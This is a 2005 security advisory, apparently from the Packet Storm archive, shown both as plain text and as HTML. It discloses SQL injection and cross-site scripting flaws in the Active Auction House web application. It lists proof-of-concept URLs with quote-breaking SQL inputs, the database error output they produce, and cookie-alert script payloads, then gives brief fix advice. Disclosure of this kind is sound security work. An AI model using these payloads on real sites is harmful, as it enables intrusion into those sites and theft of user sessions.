Active Auction House suffers from multiple SQL injection and cross site scripting vulnerabilities.
47a1f19b59e6a4e0d72e9c88d695edbf9a8eb08364c9f09e0b9d0a1e2cc57bbaThis is a multi-part message in MIME format.
------=_NextPart_000_0006_01C53A39.2224C870
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =
Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Active Auction House has multiple Sql injection, error and XSS =
vulnerabilities
Date: 06/04/2005
Vendor: Active Web Softwares
Vendor Website: www.activewebsoftwares.com
Summary: Active auction house has multiple sql injection, error and xss =
vulnerabilities.
Proof of Concept Exploits:=20
http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL_ERROR
SQL ERROR
Microsoft OLE DB Provider for ODBC Drivers error '80040e21'
ODBC driver does not support the requested properties.
/activeauctionsuperstore/displaycategories.asp, line 52
http://localhost/activeauctionsuperstore/default.asp?Sortby=3DItemName&So=
rtDir=3D'SQL_INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query expression 'ItemName 'SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39
http://localhost/activeauctionsuperstore/default.asp?Sortby=3D'SQL_INJECT=
ION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query expression ''SQL_INJECTION'.
/activeauctionsuperstore/includes/gentable.asp, line 39
http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID=3D'SQL_INJEC=
TION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query expression 'ItemID=3D'SQL_INJECTION'.
/activeauctionsuperstore/ItemInfo.asp, line 18
http://localhost/activeauctionsuperstore/sendpassword.asp
SQL INJECTON
In the Email field enter a sql injection and done ;) For example
entering 'SQL_INJECTION you get
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in FROM
clause.
/activeauctionsuperstore/sendpassword.asp, line 45
http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3Eale=
rt(document.cookie)%3C/script%3E&username=3Ddcrab&password=3D
Pops cookie
http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D=
dcrab&password=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&username=3D=
'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&password=3D
Pops cookie
http://localhost/activeauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3=
Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount=
s&Title=3D'php_evil_valuehttp://localhost/activeauctionsuperstore/sendpas=
sword.asp?Table=3DAccounts&Title=3D%22%3E%3Cscript%3Ealert(document.cooki=
e)%3C/script%3E
Pops cookie
http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccount=
s&Title=3D"><script>alert(document.cookie)</script>
Pops cookie
http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><scri=
pt>alert(document.cookie)</script>&Title=3DAccount
Pops cookie
http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><sc=
ript>alert(document.cookie)</script>&%3baccountid=3D
Pops cookie
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =
mysql_real_escape_string() and other functions for input validation =
before passing user input to the mysql database, or before echoing data =
on the screen, would solve these problems.
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah
Author:=20
These vulnerabilties have been found and released by Diabolic Crab, =
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =
contact me regarding these vulnerabilities. You can find me at, =
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =
my soon to come out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA
lWYvwOWmoKGHgDKanamGDcvc
=3DGAwn
-----END PGP SIGNATURE-----
------=_NextPart_000_0006_01C53A39.2224C870
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =
MESSAGE-----<BR>Hash:=20
SHA1</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR>[Hsc =
Security Group]=20
<A =
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=
BR>[dP=20
Security] <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></FONT>=
</DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Get Dcrab's Services to audit your Web =
servers,=20
scripts, networks, etc. Learn more at <A=20
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=
dox.org/services.ah</A></FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Severity: High<BR>Title: Active Auction =
House has=20
multiple Sql injection, error and XSS vulnerabilities<BR>Date:=20
06/04/2005</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Vendor: Active Web Softwares<BR>Vendor =
Website: <A=20
href=3D"http://www.activewebsoftwares.com">www.activewebsoftwares.com</A>=
<BR>Summary:=20
Active auction house has multiple sql injection, error and xss=20
vulnerabilities.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits: =
</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL=
_ERROR">http://localhost/activeauctionsuperstore/default.asp?catid=3D'SQL=
_ERROR</A><BR>SQL=20
ERROR<BR>Microsoft OLE DB Provider for ODBC Drivers error=20
'80040e21'</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial size=3D2>ODBC driver does not support the =
requested=20
properties.</FONT></DIV>
<DIV> </DIV>
<DIV><FONT face=3DArial =
size=3D2>/activeauctionsuperstore/displaycategories.asp,=20
line 52</FONT></DIV>
<DIV> </DIV><FONT face=3DArial size=3D2>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/default.asp?Sortby=3DIte=
mName&SortDir=3D'SQL_INJECTION">http://localhost/activeauctionsuperst=
ore/default.asp?Sortby=3DItemName&SortDir=3D'SQL_INJECTION</A><BR>SQL=
=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query=20
expression 'ItemName 'SQL_INJECTION'.</DIV>
<DIV> </DIV>
<DIV>/activeauctionsuperstore/includes/gentable.asp, line 39</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/default.asp?Sortby=3D'SQ=
L_INJECTION">http://localhost/activeauctionsuperstore/default.asp?Sortby=3D=
'SQL_INJECTION</A><BR>SQL=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query=20
expression ''SQL_INJECTION'.</DIV>
<DIV> </DIV>
<DIV>/activeauctionsuperstore/includes/gentable.asp, line 39</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/ItemInfo.asp?itemID=3D'S=
QL_INJECTION">http://localhost/activeauctionsuperstore/ItemInfo.asp?itemI=
D=3D'SQL_INJECTION</A><BR>SQL=20
INJECTION<BR>Microsoft OLE DB Provider for ODBC Drivers error =
'80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in =
query=20
expression 'ItemID=3D'SQL_INJECTION'.</DIV>
<DIV> </DIV>
<DIV>/activeauctionsuperstore/ItemInfo.asp, line 18</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/sendpassword.asp">http:/=
/localhost/activeauctionsuperstore/sendpassword.asp</A><BR>SQL=20
INJECTON<BR>In the Email field enter a sql injection and done ;) For=20
example<BR>entering 'SQL_INJECTION you get<BR>Microsoft OLE DB Provider =
for ODBC=20
Drivers error '80040e14'</DIV>
<DIV> </DIV>
<DIV>[Microsoft][ODBC Microsoft Access Driver] Syntax error in=20
FROM<BR>clause.</DIV>
<DIV> </DIV>
<DIV>/activeauctionsuperstore/sendpassword.asp, line 45</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscri=
pt%3Ealert(document.cookie)%3C/script%3E&username=3Ddcrab&passwor=
d">http://localhost/activeauctionsuperstore/?ReturnURL=3D'%3E%3Cscript%3E=
alert(document.cookie)%3C/script%3E&username=3Ddcrab&password</A>=
=3D<BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&a=
mp;username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.cookie)=
%3C/script%3E">http://localhost/activeauctionsuperstore/?ReturnURL=3Dstar=
t.asp&username=3Ddcrab&password=3D'%3E%3Cscript%3Ealert(document.=
cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.asp&a=
mp;username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&&am=
p;password">http://localhost/activeauctionsuperstore/?ReturnURL=3Dstart.a=
sp&username=3D'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&=
;&password</A>=3D<BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/account.asp?ReturnURL=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/a=
ctiveauctionsuperstore/account.asp?ReturnURL=3D%22%3E%3Cscript%3Ealert(do=
cument.cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D"http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D=
Accounts&Title=3D'php_evil_valuehttp://localhost/activeauctionsuperst=
ore/sendpassword.asp?Table=3DAccounts&Title=3D%22%3E%3Cscript%3Ealert=
(document.cookie)%3C/script%3E">http://localhost/activeauctionsuperstore/=
sendpassword.asp?Table=3DAccounts&Title=3D'php_evil_valuehttp://local=
host/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Title=3D=
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D'http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D=
Accounts&Title=3D"><script>alert(document.cookie)</script'>http://loc=
alhost/activeauctionsuperstore/sendpassword.asp?Table=3DAccounts&Titl=
e=3D"><script>alert(document.cookie)</script</A>><BR>Pops =
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D'http://localhost/activeauctionsuperstore/sendpassword.asp?Table=3D=
"><script>alert(document.cookie)</script>&Title=3DAccount'>http://loc=
alhost/activeauctionsuperstore/sendpassword.asp?Table=3D"><script&g=
t;alert(document.cookie)</script>&Title=3DAccount</A><BR>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR><A=20
href=3D'http://localhost/activeauctionsuperstore/watchthisitem.asp?itemid=
=3D"><script>alert(document.cookie)</script>&%3baccountid'>http://=
localhost/activeauctionsuperstore/watchthisitem.asp?itemid=3D"><scr=
ipt>alert(document.cookie)</script>&%3baccountid</A>=3D<B=
R>Pops=20
cookie</DIV>
<DIV> </DIV>
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20
mysql_escape_string(), mysql_real_escape_string() and other functions =
for input=20
validation before passing user input to the mysql database, or before =
echoing=20
data on the screen, would solve these problems.</DIV>
<DIV> </DIV>
<DIV>Keep your self updated, Rss feed at: <A=20
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=
h</A></DIV>
<DIV> </DIV>
<DIV>Author: <BR>These vulnerabilties have been found and released by =
Diabolic=20
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =
free to=20
contact me regarding these vulnerabilities. You can find me at, <A=20
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =
or <A=20
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =
Lookout for my=20
soon to come out book on Secure coding with php.</DIV>
<DIV> </DIV>
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =
for=20
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>
<DIV> </DIV>
<DIV>iQA/AwUBQlLSLSZV5e8av/DUEQJy+wCfficKxFWekfTVbslFf6X2fYgkFZ0AniJA<BR>=
lWYvwOWmoKGHgDKanamGDcvc<BR>=3DGAwn<BR>-----END=20
PGP SIGNATURE-----<BR></FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_0006_01C53A39.2224C870--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed